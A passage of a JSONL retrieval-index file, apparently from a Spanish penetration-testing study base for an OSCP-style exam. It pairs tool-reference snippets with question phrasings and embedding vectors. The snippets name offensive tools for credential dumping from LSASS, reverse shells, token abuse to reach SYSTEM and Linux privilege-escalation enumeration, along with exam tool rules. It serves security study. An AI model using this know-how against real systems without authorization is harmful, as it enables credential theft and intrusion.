enumeraciΓ³n de privesc | PEASS-ng |\n| PowerUp / PrivescCheck / Sherlock | privesc PowerShell | Privesc Windows |\n| mimikatz | volcar credenciales de LSASS | Mimikatz |\n| SysInternals (accesschk, PsExec) | permisos, ejecuciΓ³n | Privesc Windows |\n| Nishang | PowerShell ofensivo (shells) | Reverse shell |\n| Potato (God/Print/Juicy) | abuso de token β†’ SYSTEM | Potato attacks |", "indexar": "cual es una alternativa libre a mimikatz para volcar tokens de sistemas?", "v": [0.01074, -0.03037, -0.13428, 0.05, -0.09903, -0.02857, -0.18327, 0.01958, -0.00141, -0.09619, -0.05555, -0.07517, 0.09673, 0.09362, 0.16316, 0.02208, 0.12366, -0.14717, 0.19332, 0.07316, 0.04824, -0.13189, -0.04781, -0.10203, 0.04556, 0.06129, 0.03388, -0.04989, -0.11395, 0.08804, -0.00811, -0.08229, 0.1033, -0.04978, -0.07481, 0.03494, 0.11385, 0.05605, 0.13773, -0.0041, -0.04729, 0.00197, -0.10125, -0.01384, -0.00362, -0.04444, -0.05538, 0.11858, 0.05233, 0.00781, -0.01521, -0.04641, -0.0359, 0.03392, 0.12505, -0.12609, 0.08202, -0.11255, -0.04845, 0.05342, -0.08949, 0.02817, -0.02127, -0.03199, 0.03574, 0.03141, -0.06653, -0.06059, -0.11983, 0.13718, 0.09018, -0.03464, 0.07269, -0.01176, 0.01541, 0.07076, -0.1135, -0.02063, 0.01304, -0.0179, -0.03415, -0.07647, -0.07815, 0.13349, 0.01606, -0.06578, 0.04223, -0.03637, -0.00294, 0.07509, 0.00623, -0.00425, 0.0685, 0.08062, 0.0108, -0.0802, -0.11029, 0.06832, -0.044, 0.02511, 0.06346, 0.02093, -0.2101, 0.00091, -0.04534, 0.02498, 0.00395, -0.04098, 0.03646, -0.0194, -0.03022, 0.00819, -0.00297, -0.03739, -0.03024, 0.00973, 0.0482, 0.0671, 0.01034, -0.03317, -0.03001, 0.00373, -0.01482, -0.06511, 0.05795, -0.01374, 0.00564, 0.01485, -0.01462, 0.07797, 0.07671, 0.02563, -0.05105, -0.08092, 0.01798, -0.02637, 0.10713, -0.0216, 0.0188, -0.00615, -0.00068, 0.06949, 0.03962, -0.05467, 0.11348, -0.00521, 0.02445, -0.12518, 0.02247, -0.01559, -0.05695, 0.07373, -0.01063, 0.02996, 0.03544, -0.00591, -0.01471, -0.01312, -0.0853, 0.02169, 0.06278, -0.01351, 0.03469, 0.04065, -0.05672, -0.01851, -0.07973, -0.05786, 0.00323, 0.02086, 0.05558, 0.07155, 0.08389, -0.01935, 0.07101, -0.01823, -0.07339, -0.05725, -0.01065, -0.10991, -0.02483, -0.0127, 0.01857, -0.02245, 0.0832, -0.06814, 0.00692, 0.03906, 0.02254, 0.04549, 0.00549, -0.00588, -0.08674, -0.05715, -0.01653, -0.03931, 0.0577, -0.1011, -0.00173, -0.01201, 0.00058, 0.01161, -0.00017, -0.02327, -0.03378, 0.08335, 0.0084, 0.00752, 0.06501, -0.03692, 0.11139, 0.01484, 0.10196, -0.02266, -0.02551, -0.01459, -0.03068, -0.03824, 0.00866, -0.10323, 0.04035, 0.02699, 0.03182, 0.07366, -0.00196, 0.02269, 0.03014, 0.0975, 0.02007, 0.01557, -0.02767, -0.04536, 0.05049, -0.01289, 0.03994, 0.03015, 0.04575, -0.00078, -0.02057, -0.09025, 0.06025, 0.0755, -0.04294, -0.05048, -0.03322, -0.02158, -0.12527, 0.03436, 0.00528, -0.0039, 0.0201, 0.00603, 0.00632, 0.02099, -0.00437, -0.04712]} +{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## Las que SUBES a la vΓ­ctima Windows\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| winPEAS | enumeraciΓ³n de privesc | PEASS-ng |\n| PowerUp / PrivescCheck / Sherlock | privesc PowerShell | Privesc Windows |\n| mimikatz | volcar credenciales de LSASS | Mimikatz |\n| SysInternals (accesschk, PsExec) | permisos, ejecuciΓ³n | Privesc Windows |\n| Nishang | PowerShell ofensivo (shells) | Reverse shell |\n| Potato (God/Print/Juicy) | abuso de token β†’ SYSTEM | Potato attacks |", "indexar": "con que puedo hacer un ataque de abuso de token para subir a SYSTEM?", "v": [-0.16064, -0.05066, -0.32195, -0.15903, -0.00976, -0.0321, -0.20016, -0.03858, -0.01271, 0.08833, -0.21203, 0.00606, -0.0694, 0.00749, 0.02864, -0.00538, -0.01568, -0.01443, 0.09919, 0.0553, 0.10099, -0.03652, 0.04467, 0.01693, 0.10635, 0.10134, -0.07638, -0.03394, -0.04685, -0.11668, 0.00098, -0.00228, 0.03485, -0.04194, 0.04106, -0.11919, 0.04009, 0.09485, 0.07596, 0.10036, -0.01727, -0.01458, -0.11284, -0.07386, 0.04821, 0.03297, 0.04025, -0.04368, 0.0348, -0.06778, -0.01597, -0.06136, -0.13323, -0.25327, -0.06192, -0.07295, 0.03989, -0.13804, 0.00977, 0.05174, -0.0448, -0.07821, 0.03029, -0.05478, -0.02268, -0.00297, -0.04725, 0.04359, -0.05452, 0.16453, 0.0159, -0.07207, 0.06474, 0.06715, 0.1069, 0.06903, -0.02088, -0.03952, 0.03431, -0.03206, -0.08664, 0.01123, -0.0768, 0.04911, -0.05582, 0.00643, 0.06362, -0.01657, 0.0265, -0.04493, 0.0781, -0.04081, 0.05293, -0.05746, 0.0049, -0.03409, -0.08764, -0.13015, -0.05888, -0.0096, 0.03023, -0.11336, 0.02506, 0.09943, 0.07972, 0.02506, 0.02713, -0.04966, 0.05471, -0.08904, -0.08488, -0.01635, -0.04605, -0.07738, -0.00219, -0.02455, -0.1004, 0.00771, -0.03039, 0.01839, 0.00866, -0.00954, -0.00583, 0.00993, 0.0716, -0.00806, 0.03064, 0.01538, -0.07122, 0.01652, 0.0269, 0.02935, 0.0224, 0.00953, 0.01976, -0.01201, 0.01254, 0.00734, -0.04246, 0.02328, 0.04406, 0.17247, 0.00347, 0.00094, 0.03837, -0.00645, -0.03029, -0.01723, -0.08719, -0.00891, 0.04863, 0.00097, 0.0257, 0.04171, 0.00803, -0.03984, 0.00656, -0.07501, -0.0831, 0.05538, -0.02437, 0.0576, -0.02442, 0.06315, -0.04336, 0.02623, 0.04315, -0.07628, 0.03426, 0.04863, -0.05204, 0.05561, 0.04737, -0.02314, 0.09482, -0.0806, -0.05847, 0.00069, -0.01407, -0.03637, -0.03657, -0.09549, 0.00848, -0.00225, 0.03478, -0.01889, 0.013, 0.00896, 0.04737, 0.05183, -0.02575, 0.05957, 0.01629, 0.05237, 0.04958, -0.05998, 0.01103, 0.01643, -0.02132, 0.01346, 0.04916, 0.00328, -0.02671, -0.05111, -0.00498, 0.03943, 0.0336, -0.0326, 0.01579, 0.03939, 0.06888, -0.00907, 0.09557, -0.07826, -0.08269, 0.00445, -0.02311, 0.01721, 0.01024, -0.04442, -0.01274, 0.05212, 0.05008, 0.08175, 0.01184, -0.02855, -0.0371, -0.05413, -0.01244, 0.02082, -0.02069, -0.03715, 0.05992, -0.01286, -0.02666, -0.04943, 0.00951, -0.02569, -0.09039, -0.01621, -0.00955, 0.0052, 0.03059, 0.00085, -0.04302, -0.02572, -0.06075, 0.00809, -0.00398, -0.0133, 0.00039, -0.02341, 0.02442, -0.0186, 0.02386, -0.00398]} +{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En la vΓ­ctima Linux\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| linPEAS / LinEnum / LES / lse | enumeraciΓ³n de privesc | Privesc Linux |\n| pspy | espΓ­a procesos/cron sin root | Privesc Linux |\n\nRelacionado: searchsploit Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "que programa sirve para hacer enumeraciΓ³n de privilegios en Linux?", "v": [-0.03759, 0.04905, -0.14922, -0.17775, 0.07419, -0.18222, -0.08469, -0.00052, -0.14597, -0.04551, 0.07822, -0.01728, 0.05005, -0.11544, 0.00916, -0.05646, -0.03321, -0.1362, 0.02668, 0.00074, -0.06747, 0.12896, -0.13987, -0.03032, 0.04633, -0.01588, 0.09078, -0.12213, 0.04969, 0.14276, -0.05131, 0.04402, 0.01369, -0.05477, 0.03428, 0.09256, 0.06772, 0.03174, 0.0785, 0.13078, 0.14229, -0.00246, 0.00087, 0.02953, -0.06627, -0.17603, 0.07226, 0.00627, 0.07144, -0.13676, 0.10131, 0.00833, 0.00766, -0.09766, 0.11304, 0.01227, -0.0341, -0.14798, -0.0381, 0.05006, -0.10046, -0.063, 0.03425, -0.07675, 0.04503, 0.05574, -0.00604, -0.03398, -0.04371, 0.03199, -0.04468, 0.04666, 0.03158, -0.04285, -0.02884, -0.01542, -0.1262, 0.02419, 0.01557, -0.03689, -0.00768, -0.01641, 0.02835, 0.07299, -0.07804, -0.10152, 0.03268, 0.09289, -0.04489, 0.07008, 0.05462, 0.14432, 0.04268, 0.06892, 0.1711, -0.0158, 0.13085, 0.15099, 0.07332, 0.02359, 0.06497, -0.05934, -0.13007, 0.15508, 0.00186, 0.06558, 0.07608, -0.06804, -0.03915, -0.01475, 0.02207, -0.03061, 0.00878, -0.00046, -0.10898, 0.00958, -0.05182, 0.01989, 0.02276, -0.01576, -0.04973, -0.00184, -0.05952, 0.00986, 0.05709, -0.02618, -0.06818, 0.1635, -0.05246, 0.00175, 0.04519, -0.06831, 0.01419, 0.04014, -0.06739, -0.02971, 0.05609, -0.06972, -0.00868, -0.04232, 0.07728, 0.06555, -0.00303, 0.04263, 0.09098, -0.02248, 0.04443, -0.05032, -0.01242, -0.06703, -0.02078, -0.01817, -0.00885, 0.01284, -0.09248, -0.09249, 0.02453, 0.01945, -0.06095, 0.00435, -0.01893, -0.05267, -0.00548, -0.03201, 0.06047, -0.00863, 0.02279, 0.02852, 0.02437, 0.02909, 0.00365, 0.07898, 0.01186, -0.06471, -0.03741, -0.03363, 0.0564, -0.01412, 0.01609, 0.05553, -0.05756, 0.04051, 0.08046, 0.02072, 0.01897, 0.00815, -0.05916, 0.05497, 0.01649, 0.01141, 0.00637, 0.0192, 0.00738, -0.03276, -0.03031, 0.02658, -0.02431, 0.02149, 0.00083, -0.01957, -0.06818, 0.01614, 0.00984, 0.00706, 0.01286, 0.04424, -0.00336, -0.02863, 0.02461, 0.08731, -0.02263, 0.04729, 0.0435, 0.02528, 0.01368, -0.01639, 0.03515, 0.06833, 0.03704, 0.00782, -0.00488, -0.07027, 0.0237, 0.06157, 0.02365, -0.09535, 0.01931, -0.00547, 0.01282, -0.00123, 0.0437, -0.07043, 0.0478, -0.01904, -0.01706, -0.03907, -0.00977, 0.00992, 0.03277, -0.03797, -0.0464, 0.06307, 0.01351, -0.06261, -0.03309, -0.02086, -0.04303, -0.04198, -0.01479, -0.01518, -0.02023, -0.03571, 0.01501, -0.00423, -0.01614, 0.06983]} +{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En la vΓ­ctima Linux\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| linPEAS / LinEnum / LES / lse | enumeraciΓ³n de privesc | Privesc Linux |\n| pspy | espΓ­a procesos/cron sin root | Privesc Linux |\n\nRelacionado: searchsploit Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "con quΓ© puedo monitorear los procesos y crΓ³nicas de un sistema sin necesidad de root?", "v": [-0.02018, 0.09057, -0.10986, -0.15519, 0.05592, -0.052, 0.01422, 0.02609, 0.01278, -0.06508, -0.13038, 0.05022, 0.06491, -0.08166, 0.03897, 0.0317, 0.00036, -0.06628, -0.099, 0.03732, -0.14675, -0.20212, -0.05219, 0.05713, 0.02329, 0.18172, 0.12271, 0.02299, -0.0084, 0.00362, -0.07241, 0.07252, 0.1776, -0.01944, -0.155, -0.06563, -0.02913, 0.07856, -0.00665, 0.07325, -0.0845, -0.03241, 0.00676, 0.05713, 0.09045, -0.07937, -0.02996, -0.05779, 0.04496, -0.15092, -0.07332, -0.01704, -0.1111, 0.05061, 0.06653, -0.09164, 0.03961, -0.09644, 0.14906, -0.0534, -0.13432, 0.11856, -0.00128, -0.08942, 0.05877, -0.04769, 0.0182, -0.06207, -0.04936, 0.10939, -0.08445, 0.02595, -0.01841, -0.03553, 0.07204, 0.02765, -0.03875, -0.04658, 0.10115, 0.00017, 0.04879, 0.05663, -0.06763, 0.041, -0.06334, 0.01726, -0.00169, 0.03807, -0.02664, -0.05515, 0.02357, 0.01904, -0.04084, 0.03428, 0.13817, -0.00969, 0.06213, -0.01343, -0.09977, 0.06667, 0.03458, -0.00508, -0.02846, 0.13795, -0.01163, -0.03193, 0.11971, -0.04712, 0.05773, -0.12594, -0.04123, 0.07901, -0.05983, 0.03572, -0.04795, -0.03547, -0.08555, 0.01459, -0.05269, 0.0057, -0.00727, 0.00253, -0.02009, -0.11588, 0.08913, -0.08279, 0.00171, 0.1001, 0.05718, 0.03369, 0.02361, -0.01946, -0.02415, -0.05757, -0.04513, -0.06897, -0.02438, 0.01068, 0.04396, -0.05959, -0.07819, 0.05485, 0.01632, -0.04191, 0.10994, -0.00111, -0.0012, -0.07056, -0.06619, -0.06708, -0.06605, 0.03438, 0.03601, 0.00046, -0.03817, -0.04549, -0.01573, -0.01913, 0.02762, 0.02856, -0.03076, -0.06772, -0.05623, 0.06669, -0.0534, -0.01771, -0.01903, 0.02603, 0.04236, 0.0385, -0.03241, 0.06811, -0.02167, -0.03438, 0.00629, -0.01037, -0.04782, -0.13199, 0.01374, 0.01103, -0.0295, 0.08765, 0.02172, 0.02445, -0.02674, -0.01135, -0.02741, 0.02832, 0.11663, 0.03593, 0.0853, 0.09431, -0.00447, 0.016, 0.05565, 0.01833, -0.04461, -0.04606, -0.02563, -0.02299, -0.07811, 0.03466, 0.05532, -0.0425, 0.04186, 0.03803, -0.00655, 0.0727, 0.00753, 0.07927, 0.00449, 0.02965, 0.05498, -0.00283, -0.07305, 0.02313, -0.01076, 0.01838, -0.01709, -0.01004, 0.12605, 0.00735, 0.07012, 0.01404, -0.0244, -0.05442, 0.03403, 0.04739, 0.02001, -0.04167, -0.06466, -0.00676, -0.00979, 0.03242, -0.00249, -0.01026, -0.01321, -0.04656, -0.01068, -0.00728, 0.01402, 0.08628, 0.01179, -0.04448, -0.00187, -0.05976, -0.10077, 0.01601, 0.03944, -0.10815, -0.02311, 0.05721, 0.0113, -0.02864, 0.02329, -0.02128]} +{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## βœ… Permitido\n- Nmap + NSE, `enum4linux`, `smbclient`, `rpcclient`, NetExec/CrackMapExec (SMB).\n- Mimikatz, Impacket, BloodHound, Pivoting ligolo-ng.\n- `nikto`, `whatweb`, searchsploit, `hydra`, gobuster/feroxbuster/ffuf (Content discovery).\n- Burp Suite Community (proxy manual; el scanner activo estΓ‘ prohibido, pero no lo necesitas).\n- **Tus propios scripts** (copy-paste permitido).", "indexar": "que herramienta sirve para hacer enumeraciΓ³n de servicios y vulnerabilidades en redes", "v": [-0.00228, 0.02981, -0.19721, -0.22498, 0.05899, -0.04808, -0.1379, -0.02993, 0.00552, -0.14725, -0.07225, -0.1333, -0.01662, -0.1185, 0.06576, 0.1024, 0.02632, -0.1178, 0.1142, 0.00503, -0.0531, -0.00271, -0.10787, -0.00629, -0.15167, 0.02003, 0.04748, -0.06821, -0.14665, 0.09007, -0.04561, -0.0597, 0.03449, -0.0643, -0.08967, 0.02865, 0.00802, 0.08772, 0.02279, 0.06312, 0.04585, 0.05153, -0.0572, 0.01309, 0.05082, 0.04262, -0.07169, -0.09278, 0.01446, 0.09677, -0.07258, -0.13916, -0.22323, -0.08119, -0.06793, -0.07729, 0.14762, -0.16969, -0.05025, -0.07955, -0.07427, -0.03333, -0.00135, -0.0036, 0.05944, -0.03593, -0.0396, 0.0164, -0.07839, 0.13207, 0.02837, 0.03736, 0.03592, -0.05459, -0.03658, -0.01499, -0.02037, 0.05167, -0.02419, 0.037, -0.01161, 0.03375, -0.03381, 0.00956, -0.15571, -0.05168, 0.09752, 0.01307, 0.06873, -0.08087, 0.07091, 0.1275, -0.06478, -0.03031, -0.0043, 0.03512, 0.05615, -0.06857, 0.00577, -0.05899, 0.09178, -0.05031, -0.04514, 0.07618, -0.03218, 0.0382, -0.02784, 0.00847, -0.03374, -0.09293, 0.05163, 0.0111, -0.02225, -0.01695, -0.03179, 0.03751, -0.05793, -0.01815, 0.06683, 0.02526, 0.0455, -0.04993, -0.05129, -0.01584, 0.02395, 0.03836, -0.05101, 0.05593, 0.02438, -0.09527, 0.03014, -0.02937, -0.07516, -0.0177, 0.00276, -0.05252, 0.00266, -0.14207, -0.01937, -0.06572, 0.0131, 0.00706, -0.06314, -0.05705, 0.01524, 0.0724, 0.08386, -0.08269, -0.06737, 0.03582, 0.04281, -0.00821, -0.08568, 0.02412, -0.03715, 0.0138, -0.10187, -0.01798, -0.08529, 0.06039, -0.00236, -0.03372, 0.06583, 0.02753, 0.01469, 0.00716, 0.04857, 0.07225, 0.11062, 0.03969, -0.03974, 0.08781, 0.04422, -0.0548, 0.00272, -0.00807, -0.03004, 0.02865, -0.0047, -0.04212, -0.02318, -0.10118, -0.00471, 0.00959, 0.02429, -0.01687, 0.04626, -0.02547, -0.00692, 0.02265, -0.07728, -0.04551, -0.009, 0.03015, 0.0837, -0.03532, -0.00545, -0.00091, 0.01889, -0.05019, -0.0522, -0.03248, -0.02833, -0.00323, 0.00606, 0.07276, 0.01059, -0.05199, 0.01295, 0.08504, -0.01663, 0.01444, 0.04502, -0.04874, -0.03093, -0.05289, 0.03723, 0.02493, -0.02376, -0.00299, -0.01265, -0.06262, -0.02213, 0.03864, 0.0044, 0.05835, -0.01226, -0.06588, -0.01239, -0.02129, 0.06974, -0.10673, -0.03417, -0.02363, -0.00072, -0.10322, 0.01709, -0.01985, -0.02885, -0.01192, -0.01858, -0.00272, 0.00729, 0.00995, -0.00222, -0.04503, -0.01349, -0.02167, -0.02824, -0.08053, -0.04778, 0.00384, 0.0548, -0.00571, 0.00921, -0.06142]} +{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## βœ… Permitido\n- Nmap + NSE, `enum4linux`, `smbclient`, `rpcclient`, NetExec/CrackMapExec (SMB).\n- Mimikatz, Impacket, BloodHound, Pivoting ligolo-ng.\n- `nikto`, `whatweb`, searchsploit, `hydra`, gobuster/feroxbuster/ffuf (Content discovery).\n- Burp Suite Community (proxy manual; el scanner activo estΓ‘ prohibido, pero no lo necesitas).\n- **Tus propios scripts** (copy-paste permitido).", "indexar": "con que puedo descubrir contenido web y puntos ciegos en un servidor", "v": [0.05554, 0.05688, -0.22818, -0.04572, -0.01596, -0.126, -0.06138, -0.04709, 0.05261, -0.07639, 0.04252, 0.00433, -0.09351, 0.01663, 0.04707, 0.09912, 0.1928, 0.00482, -0.00199, -0.00784, 0.0427, -0.05207, 0.04755, -0.08404, 0.06527, -0.0179, 0.0475, -0.00912, 0.00542, -0.00932, -0.07431, -0.04619, 0.05595, 0.039, 0.0134, -0.04416, -0.02661, 0.06008, -0.04352, -0.00965, -0.01357, 0.02318, 0.00029, 0.02322, -0.01942, -0.1043, -0.00989, -0.05247, 0.05112, -0.05382, -0.03527, -0.04704, -0.28004, -0.08176, -0.06658, 0.01803, 0.09117, -0.02664, 0.12931, -0.08259, -0.07542, 0.08487, -0.03423, -0.10119, 0.02058, 0.0751, -0.02325, 0.08851, -0.02196, 0.00778, -0.08212, -0.03177, 0.05747, -0.05097, 0.10623, 0.05284, 0.00067, -0.06421, 0.0448, 0.03318, 0.05367, 0.00708, 0.0256, 0.04945, -0.06794, -0.04653, 0.01983, -0.05107, -0.0365, -0.06311, 0.0864, 0.15225, -0.02373, 0.00759, -0.11825, 0.05459, 0.09439, -0.03802, -0.01677, -0.04662, 0.01597, -0.01188, -0.04113, 0.10271, 0.0321, 0.08334, 0.10045, -0.07794, -0.06723, -0.07338, 0.03464, -0.02467, -0.0851, -0.08244, -0.09587, -0.02865, 0.02324, 0.02132, 0.11854, 0.03481, -0.04089, -0.02313, -0.04333, 0.01486, 0.0679, -0.0469, 0.07304, 0.0429, 0.03358, -0.02042, 0.00543, 0.03968, -0.08479, -0.02389, 0.01292, 0.03816, -0.03064, -0.04645, -0.05774, 0.10473, -0.0135, -0.0766, -0.00934, 0.08399, 0.09332, -0.04417, -0.00177, -0.06968, -0.11085, -0.01436, -0.12235, -0.00389, -0.04012, 0.06865, -0.04759, -0.03448, 0.0645, -0.01603, -0.0519, 0.08051, -0.01982, 0.02465, -0.01499, 0.02084, -0.02621, -0.02033, -0.14348, 0.01954, 0.1458, -0.00432, -0.13017, 0.0967, -0.05961, -0.04828, -0.05139, -0.03846, -0.07997, 0.03802, -9e-05, -0.0114, -0.03757, -0.02419, -0.05286, 0.01854, -0.09517, -0.01845, -0.01521, -0.09273, -0.03571, 0.02295, 0.02576, 0.00495, -0.02294, 0.01043, 0.11751, -0.06397, -0.01783, 0.03246, -0.03205, -0.07445, -0.00641, 0.01547, 0.04267, -0.0656, -0.03222, -0.00233, 0.00782, 0.08416, 0.00476, 0.05794, -0.01862, -0.08796, 0.06763, -0.12154, -0.04167, 0.01042, 0.04264, -0.07272, -0.10338, 0.03606, 0.0174, -0.03641, -0.03313, 0.0252, 0.10203, -0.00465, 0.01917, 0.08377, 0.01977, 0.00865, -0.05807, -0.01625, -0.09746, 0.01189, 0.03953, 0.02175, -0.00366, 0.01137, -0.08194, -0.04866, 0.0339, 0.02314, 0.02157, -0.03871, 0.01271, -0.05907, -0.02994, -0.00775, -0.06493, -0.06227, -0.0599, -0.01773, 0.07363, -0.08542, -0.00363, -0.01255]} +{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## βœ… Permitido\n- Nmap + NSE, `enum4linux`, `smbclient`, `rpcclient`, NetExec/CrackMapExec (SMB).\n- Mimikatz, Impacket, BloodHound, Pivoting ligolo-ng.\n- `nikto`, `whatweb`, searchsploit, `hydra`, gobuster/feroxbuster/ffuf (Content discovery).\n- Burp Suite Community (proxy manual; el scanner activo estΓ‘ prohibido, pero no lo necesitas).\n- **Tus propios scripts** (copy-paste permitido).", "indexar": "cual es una alternativa libre a los scanners comerciales o a Mimikatz", "v": [-0.0192, 0.04712, -0.0622, 0.00208, -0.14767, -0.09462, -0.17484, -0.00532, -0.28291, -0.06852, 0.00768, -0.1479, 0.0733, -0.00559, 0.14992, 0.02656, 0.08346, -0.11504, 0.14831, 0.01362, 0.02885, -0.04354, -0.03805, -0.04536, -0.01465, -0.05699, 0.04864, -0.06098, -0.14573, 0.12676, 0.07848, 0.01098, 0.0423, -0.01002, 0.01628, -0.09814, 0.1366, 0.00235, 0.16465, -0.07101, 0.11085, -0.08144, -0.13038, -0.00029, 0.02811, -0.00711, -0.05095, 0.02014, 0.00766, 0.05727, -0.10378, -0.02691, -0.07592, 0.07027, 0.06284, -0.02616, -0.01141, 0.10351, -0.08127, -0.02846, 0.05443, -0.02664, 0.04206, -0.05929, 0.05757, -0.01988, -0.0925, 0.0049, -0.07334, 0.05146, 0.00411, 0.00943, 0.00817, -0.07473, -0.0935, 0.07131, -0.08078, 0.02295, 0.04155, 0.01536, 0.05374, -0.08403, -0.05268, 0.12177, 0.04189, -0.1039, -0.05883, -0.02694, -0.06241, 0.04417, -0.02575, 0.06831, -0.04981, 0.0466, 0.00488, 0.0075, 0.00559, 0.07009, -0.03893, 0.20492, 0.0393, 0.02446, -0.19826, 0.02028, 0.02443, -0.06548, -0.06816, -0.06224, -0.0455, -0.0274, 0.01155, 0.00558, -0.04088, -0.0145, -0.07566, -0.03859, -0.02512, -0.01323, -0.05296, 0.00171, 0.00294, 0.00689, 0.04322, -0.04516, 0.01323, -0.01938, 0.00071, 0.08502, -0.04064, -0.00544, 0.06132, 0.00384, -0.04634, -0.10685, -0.05732, -0.01834, 0.05985, -0.10842, 0.02968, 0.01744, -0.02504, -0.07399, -0.00108, 0.02709, 0.10465, -0.01891, -0.03565, -0.04155, 0.01049, -0.02932, -0.10278, 0.0461, 0.04594, 0.11982, -0.01411, 0.0475, 0.01171, 0.01809, -0.03803, 0.05997, 0.05385, -0.01836, 0.02234, -0.00487, -0.00502, 4e-05, -0.02046, -0.03794, -0.03718, -0.02461, -0.01696, 0.03432, 0.02588, -0.04136, 0.08158, -0.04392, -0.02984, -0.01715, 0.07426, -0.09973, -0.00861, 0.06914, -0.03471, 0.0087, -0.01652, -0.05075, -0.02262, 0.05015, 0.0663, 0.01962, -0.03716, 0.00609, -0.09343, -0.06068, -0.05265, -0.0099, -0.0264, -0.06057, -0.02464, -0.04485, -0.075, -0.04421, 0.00691, -0.05969, 0.03013, 0.02104, -0.02505, 0.06361, 0.05982, 0.00076, -0.00564, 0.00728, 0.08997, 0.00797, -0.07204, -0.01823, 0.01505, -0.03782, 0.02234, -0.06436, 0.04278, 0.02808, 0.02384, 0.02498, -0.00913, 0.02189, 0.02536, 0.06981, 0.02087, -0.00513, -0.01593, 0.04227, 0.01581, 0.01513, 0.02881, 0.0213, -0.01636, 0.02967, -0.01096, -0.06264, 0.07715, 0.04377, -0.02904, -0.09091, -0.00414, 0.00832, -0.11616, 0.03521, -0.05089, -0.08461, -0.02656, 0.05356, 0.04999, 0.01242, 0.10629, -0.01802]} +{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## β›” Prohibido\n- **Metasploit / Meterpreter β†’ solo en UNA mΓ‘quina.**\n - Solo el **foothold inicial** cuenta como \"uso\"; post-explotaciΓ³n con meterpreter NO cuenta.\n- ExplotaciΓ³n automΓ‘tica: `sqlmap` en modo auto, autopwn.\n- EscΓ‘neres de vulnerabilidades masivos: **Nessus, OpenVAS, Nexpose, Core Impact**.\n- IA durante el examen.", "indexar": "que herramienta sirve para hacer un foothold inicial sin usar meterpreter", "v": [-0.08156, 0.02625, -0.28415, -0.19153, 0.01971, -0.09207, -0.13813, -0.04407, 0.00675, -0.08478, -0.14267, 0.01114, 0.04632, -0.06124, 0.02469, -0.00467, 0.1004, -0.14758, 0.00987, 0.02367, -0.07978, 0.07363, -0.08151, -0.15999, -0.13807, 0.03252, 0.04833, 0.0181, -0.18711, 0.01136, -0.01604, 0.08041, 0.06397, -0.04354, -0.08829, -0.18521, -0.03449, -0.01549, 0.00606, 0.11841, -0.03623, 0.07515, 0.04182, 0.04227, 0.01967, 0.04792, -0.02049, 0.04168, -0.07477, 0.097, 0.05291, -0.09969, -0.08258, 0.03203, -0.09295, -0.1106, 0.14925, -0.07624, -0.0885, -0.12944, -0.07378, -0.05996, -0.04315, 0.03541, 0.00858, -0.08152, -0.03111, -0.03396, -0.04409, -0.01196, 0.01293, 0.01494, -0.01677, -0.00913, 0.01555, 0.08629, -0.02582, -0.0204, 0.05205, -0.02753, -0.05449, 0.00925, -0.08762, -0.06131, -0.06719, -0.07575, 0.08041, -0.02688, 0.06095, -0.04663, 0.00407, 0.12357, -0.05292, -0.08917, 0.02449, -0.06916, 0.0438, 0.06732, -0.08627, -0.03231, 0.20226, -0.1249, -0.02044, 0.01737, -0.00465, -0.05424, -0.00075, -0.02971, -0.07006, -0.03357, 0.06138, 0.06967, -0.04812, -0.00736, -0.08218, 0.09806, -0.07022, -0.07943, -0.05247, -0.00593, 0.0394, -0.03895, -0.04959, -0.08311, 0.0135, -0.02649, 0.01941, 0.06472, 0.00522, 0.03233, -0.00747, -7e-05, -0.03533, -0.01884, -0.03987, -0.05665, 0.01701, -0.095, 0.01678, -0.01796, 0.012, 0.04736, -0.09082, -0.05696, -0.0239, 0.02141, 0.03183, -0.01053, -0.02111, -0.02301, 0.06427, -0.06607, -0.01533, 0.03764, -0.00573, -0.0306, 0.01828, 0.0585, -0.12772, 0.0616, -0.02592, -0.08338, 0.05839, -0.04546, 0.08689, -0.09962, 0.04662, 0.04514, 0.05141, 0.07178, 0.01922, 0.0273, 0.08847, -0.05861, 0.04629, -0.02191, -0.00348, -0.01026, -0.01767, -0.04549, 0.01939, -0.00671, -0.04233, 0.04072, 0.0522, -0.02042, 0.00462, -0.0244, -0.02893, 0.0585, -0.01751, 0.08829, 0.03509, -0.05465, 0.02376, 0.00383, 0.0517, -0.01671, 0.0309, -0.02642, -0.01318, -0.04208, -0.03783, -0.00204, 0.1004, -0.00434, -0.02307, -0.04466, -0.01284, 0.07739, 0.00441, -0.0276, 0.02014, 0.0277, 0.01204, -0.05127, -0.00449, 0.01875, -0.02415, -0.01719, -0.00529, 0.00838, -0.00998, 0.00916, -0.0158, 0.03348, 0.05097, -0.03703, -0.06, -0.03346, 0.00287, -0.00739, 0.00518, 0.01927, -0.0307, -0.12923, 0.06017, -0.02462, -0.05772, -0.04045, -0.03216, 0.04615, -0.0085, 0.01516, 0.01047, -0.01584, 0.0382, 0.01088, 0.00591, -0.04699, 0.01163, -0.02087, 0.03523, -0.00774, 